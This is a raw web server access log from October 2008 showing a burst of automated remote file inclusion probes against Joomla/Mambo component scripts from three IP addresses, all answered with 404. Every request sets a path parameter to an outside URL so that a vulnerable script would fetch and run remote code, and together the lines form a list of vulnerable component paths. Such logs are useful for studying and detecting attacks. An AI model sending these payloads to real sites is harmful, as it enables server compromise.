213.250.2.28 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080606.log//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:14 -0700] "GET /logs//components/com_jcs/jcs.function.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:14 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:14 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080606.log//administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080606.log//includes/move.php?GlobalSettings[templatesDirectory]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:14 -0700] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080530.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080530.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080606.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080530.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080530.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:14 -0700] "GET /logs/access_080606.log//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:14 -0700] "GET /logs//components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:14 -0700] "GET /logs//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:14 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//index2.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//index2.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//components/com_jombib/BibTex.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//mod_cbsms_messages.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080606.log//mod_cbsms_messages.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:15 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:15 -0700] "GET /logs/access_080530.log//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//index2.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//modules/calendar/mod_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//modules/calendar/mod_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//components/com_mambowiki/MamboLogin.php?IP=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080606.log//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//components/com_minibb.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:16 -0700] "GET /logs//mod_cbsms_messages.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:16 -0700] "GET /logs/access_080530.log//modules/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//modules/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//index2.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//components/calendar/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//modules/calendar/mod_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//akocomments.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//components/com_mospray/scripts/admin.php?basedir=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//components/com_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//components/com_mosmedia/media.divs.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//modules/mod_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//modules/mod_calendar.php?absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//mod_cbsms_messages.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080530.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.165.87.57 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.250.2.28 - - [23/Oct/2008:09:14:17 -0700] "GET /logs/access_080606.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
